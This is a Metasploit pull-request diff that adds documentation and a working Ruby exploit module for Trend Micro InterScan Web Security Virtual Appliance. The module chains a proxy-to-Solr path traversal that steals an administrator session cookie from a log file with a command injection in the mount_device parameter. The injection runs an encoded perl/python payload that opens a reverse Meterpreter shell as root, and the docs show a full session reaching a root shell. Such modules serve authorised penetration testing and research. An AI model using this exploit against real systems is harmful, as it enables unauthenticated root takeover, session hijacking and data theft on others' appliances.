rapid7 · h00die · Jun 22, 2020 · Jun 14, 2020 · Jun 18, 2020 · Jun 18, 2020
diff --git a/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md b/documentation/modules/exploit/linux/http/trendmicro_websecurity_exec.md
@@ -0,0 +1,78 @@
+## Vulnerable Application
+
+This module exploits multiple vulnerabilities together in order to achive a remote code execution. Unauthenticated users can execute a terminal command under the context of the root user.
+
+The specific flaw exists within the LogSettingHandler class of administrator interface software. When parsing the mount_device parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. But authentication is required to exploit this vulnerability.
+
+Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users can exploit this vulnerability in order to communicate with internal services in the product.
+
+Last but not least flaw exists within the Apache Solr application, which is installed within the product. When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of IWSS user.
+
+Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.
+
+**Vulnerable Application Installation Steps**
+
+Trend Micro Web Security is distrubed as an ISO image by Trend Micro.
+
+Following steps are valid on the CentOS 6 x64 bit operating system.
+
+1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
+2. Find "InterScan Web Security Virtual Appliance)" and click.
+3. Go to **Service Pack** section.
+4. At the time of writing this documentation, you must see **IWSVA-6.5-SP2-1548-x86_64.iso** next to Download button.
+5. Click to the download button and complete installation of ISO.
+
+[https://files.trendmicro.com/products/iwsva/6.5/IWSVA-6.5-SP2-1548-x86_64.iso](https://files.trendmicro.com/products/iwsva/6.5/IWSVA-6.5-SP2-1548-x86_64.iso)
+
+**System settings used for installation:**
+- Virtualbox or VMware can be used.
+- 8 GB of memory at least.
+- 60 GB of disk size at least.
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+- [ ] Start `msfconsole`
+- [ ] Run `use exploit/linux/http/trendmicro_websecurity_exec`
+- [ ] Set `RHOST`
+- [ ] Set `LHOST`
+- [ ] Run `check`
+- [ ] **Verify** that you are seeing `The target is vulnerable.`
+- [ ] Run `exploit`
+- [ ] **Verify** that you are seeing `Latest session id is successfully extracted : 29A589E94A0BC0954F7F9B1FE7EC8858` in console.
+
+## Scenerio
+
+This module has been tested against Trend Micro Web Security 6.5-SP2_Build_Linux_1852.
+
+```
+msf5 > use exploit/linux/http/trendmicro_websecurity_exec
+msf5 exploit(linux/http/trendmicro_websecurity_exec) > set RHOSTS 192.168.74.31
+RHOSTS => 192.168.74.31
+msf5 exploit(linux/http/trendmicro_websecurity_exec) > set LHOST 172.27.199.6
+LHOST => 172.27.199.6
+msf5 exploit(linux/http/trendmicro_websecurity_exec) > check
+[+] 192.168.74.31:8443 - The target is vulnerable.
+msf5 exploit(linux/http/trendmicro_websecurity_exec) > exploit
+
+[*] Started reverse TCP handler on 172.27.199.6:4444
+[*] Exploiting command injection vulnerability
+[+] Latest session id is successfully extracted : 29A589E94A0BC0954F7F9B1FE7EC8858
+[*] Sending stage (53755 bytes) to 172.27.192.1
+[*] Meterpreter session 1 opened (172.27.199.6:4444 -> 172.27.192.1:55842) at 2020-06-14 20:24:53 +0300
+
+meterpreter > sysinfo
+Computer        : trendmicro
+OS              : Linux 2.6.32-504.OpenVA.3.5.1375.el6.x86_64 #1 SMP Wed Dec 28 16:16:16 CST 2016
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > shell
+Process 6306 created.
+Channel 1 created.
+sh: no job control in this shell
+sh-4.1# id
+uid=0(root) gid=0(root) groups=0(root),499(iscan)
+sh-4.1#
+```
diff --git a/modules/exploits/linux/http/trendmicro_websecurity_exec.rb b/modules/exploits/linux/http/trendmicro_websecurity_exec.rb
@@ -0,0 +1,167 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',
+      'Description'    => %q{
+        This module exploits multiple vulnerabilities together in order to achive a remote code execution.
+        Unauthenticated users can execute a terminal command under the context of the root user.
+
+        The specific flaw exists within the LogSettingHandler class of administrator interface software.
+        When parsing the mount_device parameter, the process does not properly validate a user-supplied string
+        before using it to execute a system call. An attacker can leverage this vulnerability to execute code in
+        the context of root. But authentication is required to exploit this vulnerability.
+
+        Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users
+        can exploit this vulnerability in order to communicate with internal services in the product.
+
+        Last but not least flaw exists within the Apache Solr application, which is installed within the product.
+        When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.
+        An attacker can leverage this vulnerability to disclose information in the context of IWSS user.
+
+        Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2020-8604'],
+          ['CVE', '2020-8605'],
+          ['CVE', '2020-8606'],
+          ['ZDI', '20-676'],
+          ['ZDI', '20-677'],
+          ['ZDI', '20-678']
+        ],
+      'Privileged'     => true,
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'payload' => 'python/meterpreter/reverse_tcp',
+          'WfsDelay'     => 30
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [ ['Automatic', {}] ],
+      'DisclosureDate' => '2020-06-10',
+      'DefaultTarget'  => 0
+       ))
+
+    register_options(
+      [
+        Opt::RPORT(8443),
+        OptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080])
+      ]
+    )
+  end
+
+  def target_unreachable(res)
+    unless res
+      fail_with(Failure::Unreachable, 'Target is unreachable.')
+    end
+  end
+
+  def leak_logfile
+    # Updating SSL and RPORT in order to communicate with HTTP proxy service.
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+    port_restore = datastore['RPORT']
+    datastore['RPORT'] = datastore['PROXY_PORT']
+
+    vprint_status('Trying to extract session ID by exploiting reverse proxy service')
+
+    @res = send_request_cgi({
+    'method' => 'GET',
+    'uri'    => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
+    'vars_get' => {
+      'command' => 'filecontent',
+      'wt'      => 'filestream',
+      'generation' => 1,
+      'file'    => "../"*7 << "var/iwss/tomcat/logs/catalina.out",
+      }
+    })
+    target_unreachable(@res)
+    vprint_good('Successfully exploited reverse proxy service !')
+    # Restore variables and validate extracted sessionid
+    datastore['SSL'] = true if ssl_restore
+    datastore['RPORT'] = port_restore
+    @res
+  end
+
+  def extract_cookie
+
+    @jsessionid = @res.body.scan(/JSESSIONID=(.*)/).flatten.last || ''
+
+    if @jsessionid.empty?
+      fail_with(Failure::UnexpectedReply, 'There is no JSESSIONID in log file.')
+    end
+
+    print_good("Latest session id is successfully extracted : #{@jsessionid}")
+
+    # Validate session
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri('rest', 'commonlog', 'get_sessionID'),
+      'cookie' => "JSESSIONID=#{@jsessionid}"
+    })
+
+    target_unreachable(res)
+
+    unless res.code == 200
+      fail_with(Failure::NoAccess, 'Extracted cookie is not valid. Wait for sysadmin to login !')
+    end
+    @jsessionid
+  end
+
+  def check
+    leak_logfile
+    unless @res.code == 200
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Vulnerable
+    end
+  end
+
+  def exploit
+
+    unless check == CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+
+    print_status('Exploiting command injection vulnerability')
+
+    # Yet another app specific bypass is going on here.
+    # It's so buggy to make the cmd payloads work under the following circumstances (Weak blacklisting, double escaping etc)
+    # For that reason, I am planting our payload dropper within the perl command.
+
+    cmd = "python -c \"#{payload.encoded}\""
+    final_payload = cmd.to_s.unpack("H*").first
+    p = "perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
+
+    vars_post = {
+        mount_device: "mount $(#{p}) /var/offload",
+        cmd: 'mount'
+    }
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),
+      'cookie' => "JSESSIONID=#{extract_cookie}",
+      'ctype'  => 'application/json',
+      'data'   => vars_post.to_json
+    })
+  end
+end